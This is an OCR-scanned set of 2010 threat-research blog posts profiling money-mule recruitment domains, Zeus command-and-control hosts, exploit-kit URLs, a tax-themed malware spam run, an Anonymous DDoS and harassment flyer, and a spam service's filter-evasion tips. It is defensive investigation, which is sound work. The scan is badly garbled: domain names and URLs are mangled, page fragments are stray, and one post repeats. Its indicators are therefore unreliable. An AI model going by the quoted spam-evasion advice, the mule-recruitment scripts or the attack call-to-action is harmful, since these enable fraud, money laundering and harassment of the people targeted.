to $3,000 a month. NOTE: After the probationary period you 
may request additional assignments or proceed a 

full-time. If you are interested in the offer, please, contact 
me at success.sarah.forbes@googlemail.com for the details. 

FORM FORM FORM 


First name: _ 

Last name: _ 

Country of residence: _ 

Contact phone: _ 

Preferred catime: _ 

FORM FORM FORM 


Our representatives will reply within 48 hours. NOTE: This is 
not a sales position. 

Sincerely, 


Sarah Forbes 
















SUCCESS Group Inc 
job@success-groupinc. tw 
Phone: 1-585-267-5988 
Fax: 1-585-672-6137" 

Let's expose the domain portfolios in question. 
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91.200.164.18 

aurora-groupco.tw 

91.200.164.21 

aurora-groupco.ws 

91.200.164.19 

aurora-groupinc.tw 

91.200.164.19 

aurora-groupinc.ws 

91.200.164.19 

bear-groupco.ws 

91.200.164.19 

bear-groupinc.ws 

91.200.164.18 

dtizen-groupco.tw 

91.200.164.21 

dtizen-groupco.ws 

91.200.164.21 

citizen-groupsvc.tw 

91.200.164.18 

dtizengroupinc.ws 

91.200.164.22 

dassic-groupco.ws 

91.200.164.20 

dassic-groupsvc.tw 

91.200.164.20 

dassicgroupinc.ws 

91.200.164.19 

excel-groupco.tw 

91.200.164.19 

excel-groupinc.tw 

91.200.164.19 

excel-groupinc.ws 

91.200.164.18 

financial-groupco.tw 

91.200.164.20 

finandal-groupco.ws 

91.200.164.22 

financial-groupinc.tw 

91.200.164.20 

financial-groupsvc.ws 

91.200.164.20 

market-vision.tw 

91.200.164.19 

market-visioninc.ws 

91.200.164.18 

measure-groupco.tw 

91.200.164.18 

measure-groupco. ws 

91.200.164.22 

rneasure-groupinc.tw 

91.200.164.22 

measure-groupinc. ws 

91.200.164.22 

millennium-groupco. tw 

91.200.164.18 

millennium-groupinc.ws 

91.200.164.20 

millennium-groupsvc.tw 

91.200.164.18 

millennium-groupsvc.ws 

91.200.164.21 

nuris-groupco.tw 

91.200.164.21 

nuris-groupco.ws 

91.200.164.20 

nuris-groupinc.tw 

91.200.164.21 

nuris-groupinc.ws 

91.200.164.21 

render-groupco.tw 

91.200.164.21 

success-groupco. ws 



Active money mule recruitment sites parked within AS47560 
- VESTEH-NET-as Vesteh LLC, at 91.200.164.18; 

91.200.164.19; 91.200.164.20; 91.200.164.21; and 
91.200.164.22 in particular: 

aurora-groupco .tw - Email: dodo@fastermail.ru 

aurora-groupco .ws - Email: info@gtec.ru 

aurora-groupinc .tw - Email: cents@qx8.ru 

aurora-groupinc .ws - Email: info@gtec.ru 

bear-groupco .ws - Email: info@gtec.ru 

bear-groupinc .ws - Email: info@gtec.ru 

citizen-groupco .tw - Email: sane@qx8.ru 

citizen-groupco .ws - Email: info@gtec.ru 

citizengroupinc .ws - Email: info@gtec.ru 

citizen-groupsvc .tw - Email: frown@fastermail.ru 

classic-groupco .ws - Email: info@gtec.ru 

classicgroupinc .ws - Email: info@gtec.ru 

classic-groupsvc .tw - Email: haste@fastermail.ru 

excel-groupco .tw - Email: thaws@bigmailbox.ru 

excel-groupinc .tw - Email: thaws@bigmailbox.ru 
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excel-groupinc .ws - Email: info@gtec.ru 



financial-groupco .tw - Email: think@maillife.ru 
financial-groupco ,ws - Email: info@gtec.ru 
financial-groupinc .tw - Email: sane@qx8.ru 
financial-groupsvc ,ws - Email: info@gtec.ru 
market-vision .tw - Email: place@bigmailbox.ru 
market-visioninc .ws - Email: info@gtec.ru 
measure-groupco .tw - Email: cents@qx8.ru 
measure-groupco .ws - Email: info@gtec.ru 
measure-groupinc .tw - Email: cents@qx8.ru 
measure-groupinc .ws - Email: info@gtec.ru 
millennium-groupco .tw - Email: thaws@bigmailbox.ru 
millennium-groupinc .ws - Email: info@gtec.ru 
millennium-groupsvc .tw - Email: thaws@bigmailbox.ru 
millennium-groupsvc .ws - Email: info@gtec.ru 
nuris-groupco .tw - Email: rips@fastermail.ru 
nuris-groupco .ws - Email: info@gtec.ru 
nuris-groupinc .tw - Email: rips@fastermail.ru 
nuris-groupinc .ws - Email: info@gtec.ru 
render-groupco .tw - Email: muggy@freenetbox.ru 
success-groupco .ws - Email: info@gtec.ru 



Naturally, it gets even more interesting with AS47560 - 

VESTEH-NET-as Vesteh LLC acting as a good example 

of cybercrime-friendly virtual neighborhood. Not only are the 
cybercriminals hosting the money mule recruitment 

sites there, but also, a decent number of Zeus crimeware C 
&Cs, client-side exploit serving campaigns are currently 
active there. 
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Zeus C &Cs active at [17]91.200.164.44, front pages return 
"dsfkgjk rgkj": 

justinnewl .com - Email: 3242dswewrf@yahoo.com 
justinnew2 .com - Email: 3242dswewrf@yahoo.com 
justinnew3 .com - Email: 3242dswewrf@yahoo.com 


justinnew4 .com - Email: 3242dswewrf@yahoo.com 
justinnew5 .com - Email: 3242dswewrf@yahoo.com 
justinnew6 .com - Email: 3242dswewrf@yahoo.com 
justinnew7 .com - Email: 3242dswewrf@yahoo.com 
justinnew8 .com - Email: 3242dswewrf@yahoo.com 
justinnew9 .com - Email: 3242dswewrf@yahoo.com 
justinnewlO .com - Email: 3242dswewrf@yahoo.com 
justinnewll .com - Email: 3242dswewrf@yahoo.com 
justinnewl2 .com - Email: 3242dswewrf@yahoo.com 
justinnewl2 .com - Email: 3242dswewrf@yahoo.com 
justinnewl3 .com - Email: 3242dswewrf@yahoo.com 
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justinnewl4 .com - Email: 3242dswewrf@yahoo.com 
justinnewl5 .com - Email: 3242dswewrf@yahoo.com 
justinnewl6 .com - Email: 3242dswewrf@yahoo.com 
justinnewl7 .com - Email: 3242dswewrf@yahoo.com 
justinnewl8 .com - Email: 3242dswewrf@yahoo.com 
justinnewl9 .com - Email: 3242dswewrf@yahoo.com 
justinnew20 .com - Email: 3242dswewrf@yahoo.com 
justinnew21 .com - Email: 3242dswewrf@yahoo.com 







justinnew22 .com - Email: 3242dswewrf@yahoo.com 

justinnew23 .com - Email: 3242dswewrf@yahoo.com 

justinnew24 .com - Email: 3242dswewrf@yahoo.com 

Historical OSINT of live exploit serving, malware phone back 
locations parked at 91.200.164.44: 

abecedarian .in - Email: jobmasterx@yahoo.com 

absinthial .in - Email: jobmasterx@yahoo.com 

acarine .in - Email: jobmasterx@yahoo.com 

aeruginous .in - Email: jobmasterx@yahoo.com 

agrestic .in - Email: jobmasterx@yahoo.com 

alveolate .in - Email: jobmasterx@yahoo.com 

anaclastic .in - Email: jobmasterx@yahoo.com 

anatine .in - Email: jobmasterx@yahoo.com 

anconoid .in - Email: jobmasterx@yahoo.com 

ancoral .in - Email: jobmasterx@yahoo.com 

anserine .in - Email: jobmasterx@yahoo.com 

archididascalian .in - Email: jobmasterx@yahoo.com 

arietine .in - Email: jobmasterx@yahoo.com 

babied .in - Email: jobmasterx@yahoo.com 

baffled .in - Email: jobmasterx@yahoo.com 



banal .in - Email: jobmasterx@yahoo.com 
barren .in - Email: jobmasterx@yahoo.com 
battle-worn .in - Email: jobmasterx@yahoo.com 
bawled .in - Email: jobmasterx@yahoo.com 
beatific .in - Email: jobmasterx@yahoo.com 
beckoned .in - Email: jobmasterx@yahoo.com 
betonomeshalkatraktor .in - Email: ynetsw@gmail.com 
fcaliber65 .in - Email: wert32@rambler.ru 
humpiiil .in - Email: wert32@rambler.ru 
izyvecheniyOtragladit .in - Email: ynetsw@gmail.com 
lifeberyt .in - Email: wert32@rambler.ru 
marrychristmasforyou .com - ACTIVE 
marrychristmasforyou .net - ACTIVE 
mylstdomain .in - Email: wert32@rambler.ru 
pingcrews .in - Email: jobmasterx@yahoo.com 
razymniygluk .in - Email: ynetsw@gmail.com 
rescservuce .in - Email: wert32@rambler.ru 


121 



AS701 

UlltCT 



Name servers of notice: 

dnsl.yekt.net - 67.15.47.189 

nsl.trythisok.cn - 89.248.166.45 - chunk@qx8.ru 

nsl.basilkey.ws - 89.248.166.45 - info@gtec.ru 

ns2.maninwhite.cc - 38.99.169.210 - duly@fastermail.ru 

ns2.mythinregion.ws - Email: info@gtec.ru 

ns2.partytimee.cn - 38.99.169.208 - Email: chunk@qx8.ru 

ns3.cnnandpizza.cc - 195.182.57.36 - Email: 
bears@fastermail.ru 







ns3.partymorning.ws - 94.23.114.71 - Email: info@gtec.ru 

Take a look at the routing graph for a moment. Who do we 
have here? Our "dear friends" at [18]AS5577 

ROOT eSolutions (also seen [19]here; [20]here; [21]here; 
[22]here; [23]here and [24]here) acting as a node to an 

ever expanding portfolio of malicious customers, with 

AS50215 Troyak-as Starchenko Roman Fedorovich part 
of the 

[25]Pushdo crimeware and [26]client-side exploit serving 
campaigns, [27]second in the list. 

AS47560 - VESTEH-NET-as Vesteh LLC has been notified, 
awaiting response/take down reaction. Or the lack of 

such. 

Related coverage of money laundering in the context 
of cybercrime: 

[28] Keeping Reshipping Mule Recruiters on a Short Leash 

[29] Keeping Money Mule Recruiters on a Short Leash 
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[30] Standardizing the Money Mule Recruitment Process 

[31] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[32] Money Mules Syndicate Actively Recruiting Since 2002 

[33] lnside a Money Laundering Group's Spamming 
Operations 



This post has been reproduced from [34]Dancho Danchev's 
blog. Follow him [35Jon Twitter. 

1. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 

2. http://ddanchev.blo as pot.com/2009/ll/keepin a -nnone v- 
mule-recruiters-on-short.html 

3. http://blo a s.zdnet.com/securit v/? p=2293 

4. 

http://www.messa a elabs.com/mlirepQrt/MLl 2010 01 Ian FIN 
AL EN. odf 

5. http://blo a s.zdnet.com/securit v/7 o = 1514 

6. http://twitter.com/danchodanchev/status/8638311702 

7. http://twitter.com/danchodanchev/status/8638405085 

8. http://twitter.com/danchodanchev/status/8638505748 

9. http://twitter.com/danchodanchev/status/8638623148 

10. http://twitter.com/danchodanchev/status/8638713256 

11. http://twitter.com/danchodanchev/status/8638841565 

12. httos://zeustracker.abuse.ch/monitor. oh p?as=47560 

13. http:// a oo a le.com/safebrowsin a /dia a nostic? 
site=AS:47560 

14. http://blo a s.zdnet.com/securit v/? o=1085 

15. http://www.delohifaa.com/faa/scams/fl057.shtml?o=22 

16. http://www.delohifaa.com/faa/scams/fl057.shtml?o=22 














































17. https://zeustracker.abuse.ch/monitor. php? 
i paddress=91.200.164.44 


18. http://hphosts.blo as pot.com/2009/ll/crimeware-friendl v- 
is ps-root-esolutions.html 

19. http://ddanchev.blo as pot.com/20Q9/12/koobface- 
friendlv-riccom-ltd-as29550.html 

20. http://ddanchev.blo as pot.com/2009/Q2/cost-of- 
anonvmizin a-c vbercriminals.html 

21. http://ddanchev.blo as pot.com/2009/12/diverse-portfolio- 
of-fake-securitv.html 

22. http://ddanchev.blo as pot.com/2009/Q8/us-federal-forms- 
blackhat-seo-themed.html 


23. http://ddanchev.blo as pot.com/20Q9/ll/koobface- 
botnets-scareware-business.html 


24. http://ddanchev.blo as pot.eom/2009/05/diverse-portfolio- 
of-fake-securitv.html 

25. http://ddanchev.blo as pot.com/201Q/01/pushdo-servin a- 
crimeware-client-side.html 


26. http://ddanchev.blo as pot.com/2010/Q2/photoarchive- 
crimewareclient-side.html 


27. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access-themed-spam-campai a n.html 

28. http://ddanchev.blo as pot.com/20Q9/12/keepin a- 
reshi p pin a -mule-recruiters-Qn.html 

29. http://ddanchev.blo as pot.com/20Q9/ll/keepin a -mone v- 
mule-recruiters-on-short.html 






















































30. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 


31. http://ddanchev.blo as pot.com/2008/Q7/monev-mule- 
recruiters-use-asproxs-fast.html 

32. http://ddanchev.blo as pot.com/20Q8/10/monev-mules- 
s vndicate-activelv.html 

33. http://ddanchev.blo as pot.com/2009/05/inside-mone v- 
launderin a-a roups-spammin a .html 

34. http://ddanchev.blo as pot.com/ 

35. http://twitter.com/danchodanchev 
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Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild (2010-02-11 22:19) 


A currently ongoing malware campaign courtesy of the gang 
that's been busy rotation themes over the past few 































weeks, has changed the theme to 11 You are in a higher tax 
bracket, and continues serving client-side exploits next to a 
Zeus crimeware sample using a bogus " You don't have the 
latest version of Macromedia Flash Player 1 ' error message. 

- Sample URL: repl031 .be/reports/getreport.php? 
email=email - Email: souchuck@yahoo.com. The following 

currently suspended domains are also involved - repl032 
.be; repl030.me .uk; repl031.me .uk; repl032.me 
.uk; repl030.co .uk; repl031.co .uk; repl032.co .uk; 
repl043.me .uk; repl041.co .uk; repl032.co .uk 124 



11680.31 193 


^ 116.80 0 0/14 - AS »■ AS2510 



- UPDATED: The most recently spamvertised domains 
include: 

repl041 .kr - Email: Souchuck@yahoo.com 
repl042 .kr - Email: Souchuck@yahoo.com 
repl043 .kr - Email: Souchuck@yahoo.com 
























rep1044 .kr - Email: Souchuck@yahoo.com 
repl041.ne .kr - Email: Souchuck@yahoo.com 
repl042.ne .kr - Email: Souchuck@yahoo.com 
repl043.ne .kr - Email: Souchuck@yahoo.com 
repl041.co .kr - Email: Souchuck@yahoo.com 
repl042.co .kr - Email: Souchuck@yahoo.com 
repl043.co .kr - Email: Souchuck@yahoo.com 
repl044.co .kr - Email: Souchuck@yahoo.com 
repl041.or .kr - Email: Souchuck@yahoo.com 
repl042.or .kr - Email: Souchuck@yahoo.com 
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repl043.or .kr - Email: Souchuck@yahoo.com 
repl044.or .kr - Email: Souchuck@yahoo.com 

- Sample detection rate: 

update.exe - [l]PWS:Win32/Zbot.RS - Result: 8/41 (19.52 %); 
MD5: 44028f0e2fa3ec70507992cb0684ff58 


- Name servers of notice: 


nsl.socialworc .net - 87.117.245.9 - Email: 
storylink@live.com 

nsl.trihtmens .net - 87.117.245.9 

nsl.inserthelping .net - suspended 

nsl.citysatellites .net - down 

- Sample message: 11 Dear taxpayer, The Federal income 
tax is a progressive tax, meaning that the more you earn, 
the higher your tax rate. Your tax rate depends not just upon 
your taxable income, but also upon your filing status (single, 
married filing jointly, etc.). You're in a higher tax bracket 
because: - your annual income for the last tax year has 
increased. Please review your annual tax report immediately 
at: get report." 

- Sample iFrame used: 109.95.115.36 /uzs/in.php also 
used in last [2]week's PhotoArchive campaign; - AS50215 - 

Troyak-as Starchenko Roman Fedorovich - 
akanyovskiy@troyak.org; akanyovskiy@vishclub.net and 
serving CVE-2007- 

5659; CVE-2008-2992; CVE-2009-0927; CVE-2009-4324. 
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114 186 245125 -^-► 114 16000/11 -► AS4713 



- Sample malware detection rate/phone back C &Cs: 

update.exe - [3]Trojan-Spy.Win32.Zbot.gen - Result: 8/41 

(19.52 %), MD5: fl5d88ac3e381aeb6b3779b0dd7042ce. 

Upon execution phones back to [4]trollar .ru/cnf/trl.jpg - 
109.95.114.133 - Email: bernardo_pr@inbox.ru; 
























[5]AS50369 - VISHCLUB-AS Kanyovskiy Andriy Yuriyovich. 
Email was also used to register the Zeus C &C from last 
week's "[6] PhotoArchive Crimeware/Client-Side Exploits 
Serving Campaign in the Wild" campaign. 

- Name servers of notice: nsl.gompley net - 
74.117.63.218 - Email: storylink@live.com; nsl.hoocky .net - 

74.117.63.218 - Email: footboolfan7@aol.com, also known to 
have been parked on the same IP are nsl.allhostinfo 

.com - Email: line@metalfan.com; nsl.helpgoldbank .net - 
Email: glonders@gmail.com and nsl.drowthdb .com. 

- Second portfolio of related name servers: the second 
portfolio is parked at 62.19.3.2 - nsl.faktorypro .com - 

Email: poolbill@hotmail.com; nsl.x-videocovers .net - Email: 
storylink@live.com; nsl.serwisezone .net - Email: 

line@metalfan.com; nsl.guarantexpres .com; 
nsl.respectiveowners .net 
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Updates will be posted as soon as new developments 
emerge. 

Related coverage of the gang's previous campaigns: 

[7] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[8] Facebook/AOL Update Tool Spam Campaign Serving 
Crimeware and Client-Side Exploits 

[9] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 



[10] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[11] Pushdo Injecting Bogus Swine Flu Vaccine 

[12] "Your mailbox has been deactivated" Spam Campaign 
Serving Crimeware 

[13] Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[14] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 

This post has been reproduced from [15]Dancho Danchev's 
blog. Follow him [16]on Twitter. 

1. 

http://www.virustotal.com/analisis/aa9f7b84bf5bl937a529b 

0b9c0d3488971cdf23d318053cfe818333ae7639737-12659 

30510 

2. http://ddanchev.blo as pot.com/2010/Q2/photoarchive- 
crimewareclient-side.html 

3. 

http://www.virustotal.com/analisis/08c6a859e00d5011bf3c6 

7a03466c5567db7678f0bba0fl74619ac5298bf2ec9-12659 

15258 

4. https://zeustracker.abuse.ch/monitor. ph p?host=trollar.ru 

5. https://zeustracker.abuse.ch/monitor. ph p?as=50369 
















6. http://ddanchev.blo as pot.com/2010/Q2/photoarchive- 
crimewareclient-side.html 


7. http://ddanchev.blo as pot.com/2010/Q2/photoarchive- 
crimewareclient-side.html 


8. http://ddanchev.blo as pot.com/201Q/01/facebookaol- 
u pdate-tool-spam-campai a n.html 

9. http://ddanchev.blo as pot.com/201Q/01/pushdo-servin a- 
crimeware-client-side.html 


10. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access-themed-spam-campai a n.html 

11. http://ddanchev.blo as pot.com/20Q9/12/pushdo-in i ectin a- 
bo a us-swine--nu.html 

12. http://ddanchev.blo as pot.com/2009/ll/vour-maiilbox-has- 
been-deactivated-spam.html 

13. http://ddanchev.blo as pot.com/20Q9/10/on a oin a -fdic- 
s pam-campai a n-serves-zeus.html 

14. http://ddanchev.blo as pot.com/2009/Q7/multitaskin a -fast- 
f1ux-botnet-that.html 


15. http://ddanchev.blo as pot.com/ 

16. http://twitter.com/danchodanchev 
128 

'Anonymous' Group's DDoS Operation Titstorm (2010- 
02-12 01:40) 
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operation: titstorm 

A PART OF OPERATION INTERNET FREEDOM 


the Attack ! 


1. On February 10th 8:00 AM Australian time 
we will begin a DDoS of government servers 

2. This will be quickly followed by a shitstorm 
of pom email, fax spam, black faxes, and 
prank phone calls to government offices 
(emails/faxes should focus on small-breasted 
pom, cartoon pom, and female ejaculation, 
the 3 types banned so far) 

3. Information on the targets for the shitstorm 
can be found here: 

HTTP: /AILIU. RPH. GOVRU/OPS/ROnifll STRPTl 
OT1.HTIT 


WHAT? WHEN? 

PARTICIPATE FELLOW ANONYMOUS! 

The Campaign begins.. 

8:00 AM, AUSTRALIAN TIME (GMT +10:00) 
February 10th. 

(FEBRUARY 9TH FOR 
U.S.A, AND CANADA.) 

f5:00 EST14:00 CSTI etc.) 

TO FULLY PARTICIPATE IN THE ATTACK: 

Use an IRC Client and connect to... 

Server: irc.anonnet.org 
Channel: #titstorm 


’We stt AoonynKM. We att legion.* 
-Regards. Anonymous 


'Anonymous' Group's DDoS Operation Titstorm (2010- 
02-12 01:40) 

With last months [l]'Anonymous' Group's DDoS Operation 
Titstorm campaign a clear success based on the real-time 

monitoring of the crowdsourcing-driven attack, it's time to 
take a brief retrospective on the tools and tactics used, and 
relate 

• Go through an analysis of 2009's failed [2]Operation 
Didgeridie DDoS campaign 

Why is Operation Titstorm an important one to profile? Not 
only because it worked compared to [3]Operation 

Didgeridie, but also, due to the fact that crowdsourcing 
driven (malicious culture of participation) DDoS attacks have 
proven themselves throughout the past several years, as an 
alternative to DDoS for hire attacks. 



- DIY ICMP flooders 


- Web based multiple iFrame loaders to consume server CPU 

- Web based email bombing tools+predefined lists of emails 
belonging to government officials/employees 

Go through related posts on crowdsourcing DDoS 
attacks/malicious culture of participation: 

[4] Coordinated Russia vs Georgia cyber attack in progress 

[5] lranian opposition launches organized cyber attack 
against pro-Ahmadinejad sites 

[6] People's Information Warfare Concept 

[7] Electronic Jihad v3.0 - What Cyber Jihad Isn't 
130 

[8] Electronic Jihad's Targets List 

[9] The DDoS Attack Against CNN.com 

[lOJChinese Hacktivists Waging People's Information Warfare 
Against CNN 

[llJThe Russia vs Georgia Cyber Attack 

[12] Real-Time OSINT vs Historical OSINT in Russia/Georgia 
Cyberattacks 

[13] Pro-lsraeli (Pseudo) Cyber Warriors Want your Bandwidth 

[14] lranian Opposition DDoS-es pro-Ahmadinejad Sites 

This post has been reproduced from [15]Dancho Danchev's 
blog. Follow him [16]on Twitter. 



1. http://www.smh.com.au/technolo a v/technolo av- 

news/operation-titstorm-hackers-brin a -down- a overnment- 

website 


s-2010021Q-nqku.html 

2. http://blo a s.zdnet.com/securit v/? p=4234 

3. http://blo a s.zdnet.com/securit v/? p=4234 

4. http://blo a s.zdnet.com/securit v/? p = 1670 

5. http://blo a s.zdnet.com/securit v/? p = 3613 

6. http://ddanchev.blo as pot.com/20Q7/10/peoples- 
information-warfare-concept.html 

7. http://ddanchev.blo as pot.com/2007/ll/electronic- i ihad- 
v30-what-cvber- i ihad.html 

8. http://ddanchev.blo as pot.com/20Q7/ll/electronic- i ihads- 
tar a ets-list.html 

9. http://ddanchev.blo as pot.com/2008/Q4/ddos-attack- 
aa ainst-cnncom.html 

10. http://ddanchev.blo as pot.com/2008/Q4/chinese- 
hacktivists-wa aina- peoples.html 

11. http://ddanchev.blo as pot.com/2008/Q8/russia-vs- a eor aia- 
c vber-attack.html 

12. http://ddanchev.blo as pot.com/2008/10/real-time-osint- 
vs-historical-osint-in.html 


13. http://ddanchev.blo as pot.com/20Q9/01/pro-israeli- 
pseudo-cvber-warriors-want.html 



























































14. http://ddanchev.blo as pot.com/2009/Q6/iranian- 
op position-ddos-es-pro.html 

15. http://ddanchev.blo as pot.com/ 

16. http://twitter.com/danchodanchev 
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Dissecting an Ongoing Money Mule Recruitment 
Campaign (2010-02-12 23:46) 

Money mule recruiters can be sometimes described as mass¬ 
marketing zombies, who have absolutely no idea who 















they're trying to recruit. Cefin Consulting & Finance - 
cefincf .com - 195.190.13.106 - Email: flier@infotorrent.ru 
is the very latest example of such a campaign, trying to 
recruit, well, me. 

The initial recruitment email was spammed from 

maximumsxz78@roulottesste-anne.com with IP 
221.154.76.195: 

11 Cefin Consulting & Finanace is one of the leading providers 
of consulting services in the world. Our success depends 
both on high quality of services and on professionally 
managed and reliable business processes. This is the reason 
why quality is our main concern. However, the only way to 
reach top-notch quality in our business is permanent 
struggle for quality and engineering of stable procedures. It 
is not possible to reach high quality standards without 
dedicated personnel striving for flawless operation of 
processes and projects in their daily life. 

Currently we have a Financial Manager opening. No 
deadlines for applications are set. The job of Financial 

Manager includes processing of money transfers, sent to his 
personal bank accounts by company clients. Upon 

receiving a transfer the Financial Manager has to redirect it 
to the account specified by our dispatchers. AH you need for 
this job are: 3-4 free hours a day, your wish, ability to work in 
a team and responsibility. The initial wages will equal 5 % of 
total monthly turnover. 

Requirements to Candidates: 

- 20 years old and more 
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- Be able to check your email several times a day 

- Should have personal (or business) bank account 

- Have a skill to communicate and access to the Internet. 

- Foreign language (English is preferable). 

- To have an opportunity in any working hours to go to 
closest Western Union location and make money transfer. 

What we offer: 

- Generous wages - (Your earnings will originally make 5 % 
from each payment. Your earnings will originally make 5 % 






















from each payment. After 5 remittances if you will 
operatively work and correctly, your earnings raises up to 10 
%.) 

- Opportunity of increase in your earnings. 

- Free seminars and training courses (After 6 months of great 
work). 

2010 © Cefin Consulting & Finanacelf you are interested in 
this opening, don't hesitate to send your CV at our e-mail: 
cefincfss@yahoo.com AH right reserved. 11 

Response received from cefincfss@yahoo.com with IP 
[1]91.207.4.162, asking for the following details, althrough 

the [2]DIY money-mule recruitment management 
interface automates the entire process, thereby allowing it 
to scale: 

11 If you have understood the meaning of work and ready to 
begin working with us, please send us your INFO in the 
following format: 
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1) First name; 2) Last name; 3) Country; 4) City; 5) Zip code; 
6) Home Phone number, Work Phone number, 

Mobile Phone number; 7) Bank account info:; a) Bank name; 
b) Account name; c) Account number; d) Sort code; 8) Scan 
you passport or driver license" 



The CV forwarding email provided is 
mynesco@yahoo.com, although they'll even recruit you 
without sending 

them the required CV. 

What's special about the bogus company, is not the new 
template layout that they've purchased from a [3]vendor 
offering creative for money-mule recruitment 
campaign, but their attempt to establish themselves as a 
trusted brand by featuring fake certificates issued by easily 
recognizable brands, such as Western Union, Money 
Gram, Investors in People, the World Business 
Community and even an award from the Chamber Awards 
for 2004 in the category - " Most Promising New Business". 

Moreover, parked on the very same IP where the 
money mule recruitment is, are also domains 
currently serving 

live exploits, as well as a DIY interface for a 
spamming service known as "OS-CORP". 

The certificates in question: 
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Cefin Consulting & Finance describes itself as: 

11 Cefin consulting & Finance was founded at the beginning of 
1990. The emerged structure united specialists with unique 
background in management consulting, marketing research, 
business evaluation and stock-exchange 

operations. The following two companies constitute Cefin 
consulting & Finance: 

- Omega Financial Dept. - the dedicated company in the field 
of securities operations; 

- Omega Consult - the dedicated consulting company, 
rendering services in strategic planning and corporate 
management. 

Activity of Cefin consulting & Finance is focused on 
generation of balanced solutions for active development of 
the company and minimization of business risks. 
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Cefin consulting & Finance offers successful managerial 
solutions through consulting support to projects in various 
spheres, namely: comprehensive restructuring and 
organizational development, generation of managing 
companies, engineering of tailored management systems for 
corporate clients, implementation of project management 
methods, business development financial and economic 
simulation. 


Top-notch dedicated professionals with key competence in 
various consulting fields constitute our rigorous staff. 

We boast to have management consulting and business 
strategy development experts, certified securities dealers, 
assessment and registration, marketing and financial 
specialists, corporate law and anti-monopoly legislation 
gurus. 

Address: Cefin consulting & Finance is located at 510 East 
80th Street, New York, New York 10021 , United States 786- 
475-3994; 786-475-3994 (FAX)" 
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The money mule recruitment domain cefincf .com - 
195.190.13.106 - Email: flier@infotorrent.ru remains active. 

Parked on the same IP are also the following domains, 
currently hosting live exploit kits: 

384756783900 .cn - Email: abuse@domainsreg.cn 

109438129432 .cn - Email: abuse@domainsreg.cn 

234273849543 .cn - Email: abuse@domainsreg.cn 

783456788839 .cn - Email: abuse@domainsreg.cn 

odnaklasniki .cn - Email: Michell.Gregory2009@yahoo.com 
- Email profiled in December 2009's M [4] Celebrity- 

Themed Scareware Campaign Abusing DocStoc" - 

money mule recruitment connection 

mynes-consultings .cn - Email: grishanizov@gmail.com 


mynes-consult .cn - Email: grishanizov@gmail.com 
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Sample live exploit structure, currently active at these 
domains: 

- mynes-consult .cn -> if exploitation is not possible, the 
user is redirected to the legitimate newegg.com 

- mynes-consult ,cn/load.php?spl = mdac 

- mynes-consult .cn/load.php?spl = buddy 

- mynes-consult .cn/load.php?spl = myspace 

- mynes-consult .cn/load.php?spl=vml2 

- mynes-consult .cn/load.php?spl=ymj 

- mynes-consult .cn/load.php?spl=zangol 

- mynes-consult .cn/load.php?spl=zango2 

All of these exploits drop load.exe - 

[5]TrojanDownloader:Win32/Cutwail.gen!C - Result: 
41/41 (100.00 %), 

which upon execution phones back to 69.162.86.210, 

With cybercriminals actively multi-tasking these days, this 
money mule recruitment gang doesn't make an ex¬ 
ception. On one of the domains listed above, a low-profile DIY 
spamming service known as OS-CORP is offering its 


services. 
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The DIY spam service, also has Terms of Service and offers 
basic spamming recommendations. The following is a 

roughly translated version of them: 

" - No child Porno spamming! 

- Do not offer me affiliate program ( % of sales), I do not 
care! 

- ICQ almost always online, but this does not mean that I 
always present! If you have not received an answer 

immediately have patience, I will answer as soon as 
appearing! 

- Mailing lists on bases of certain subjects are more 
expensive! 

-1 am not responsible for your campaigns and sites sites that 
are sometimes nailed in the process of spam! Use anti-abuse 
hosting! 

- I'm not offering anti-abuse hosting services! 

-1 don't offer recommendations for such services. I give only 
the services that spam! 

- Campaign's size should be UP TO 50 kb! 
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Recommendations for the preparation of material for 
delivery! 

- Do not always send the same text messages, ideally, to 
change the text after each mailing, the effect of there! 

- Do not use themes in writing (headers) words such as 
EARN, OFFER, do not put a lot of exclamation marks and 
other (better do without them), just one! 

- For a good response from countries whose native language 
is not English (eg Sweden, Spain, Denmark, etc.) is highly 
desirable to use the native language of the text distributed 
to countries, it gives a wonderful effect, and should not be 
mistaken, in countries such not everyone knows English, 
verified repeatedly! 

- Do not write too long texts on a number of reasons this 
does not give a positive effect, but not limited to one 
sentence worth! Ideally, make the text in a few not 
particularly bulky paragraphs !" 

The deeper your analyze, the more malicious, and most 
importantly, inter-connected it gets. 

Related coverage of money laundering in the context 
of cybercrime: 

[6] Keeping Money Mule Recruiters on a Short Leash - Part Two 
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[7] Keeping Reshipping Mule Recruiters on a Short Leash 

[8] Keeping Money Mule Recruiters on a Short Leash 

[9] Standardizing the Money Mule Recruitment Process 



[10] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[11] Money Mules Syndicate Actively Recruiting Since 2002 

[ 12]Inside a Money Laundering Group's Spamming 
Operations 

This post has been reproduced from [13]Dancho Danchev's 
blog. Follow him [14]on Twitter. 
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Dissecting an Ongoing Money Mule Recruitment 
Campaign (2010-02-12 23:46) 

Money mule recruiters can be sometimes described as mass¬ 
marketing zombies, who have absolutely no idea who 

they're trying to recruit. Cefin Consulting & Finance - 

cefincf .com - 195.190.13.106 - Email: flier@infotorrent.ru 
is the very latest example of such a campaign, trying to 
recruit, well, me. 

The initial recruitment email was spammed from 

maximumsxz78@roulottesste-anne.com with IP 
221.154.76.195: 

11 Cefin Consulting & Finanace is one of the leading providers 
of consulting services in the world. Our success depends 
both on high quality of services and on professionally 

























managed and reliable business processes. This is the reason 
why quality is our main concern. However, the only way to 
reach top-notch quality in our business is permanent 
struggle for quality and engineering of stable procedures. It 
is not possible to reach high quality standards without 
dedicated personnel striving for flawless operation of 
processes and projects in their daily life. 

Currently we have a Financial Manager opening. No 
deadlines for applications are set. The job of Financial 

Manager includes processing of money transfers, sent to his 
persona! bank accounts by company clients. Upon 

receiving a transfer the Financial Manager has to redirect it 
to the account specified by our dispatchers. AH you need for 
this job are: 3-4 free hours a day, your wish, ability to work in 
a team and responsibility. The initial wages will equal 5 % of 
total monthly turnover. 

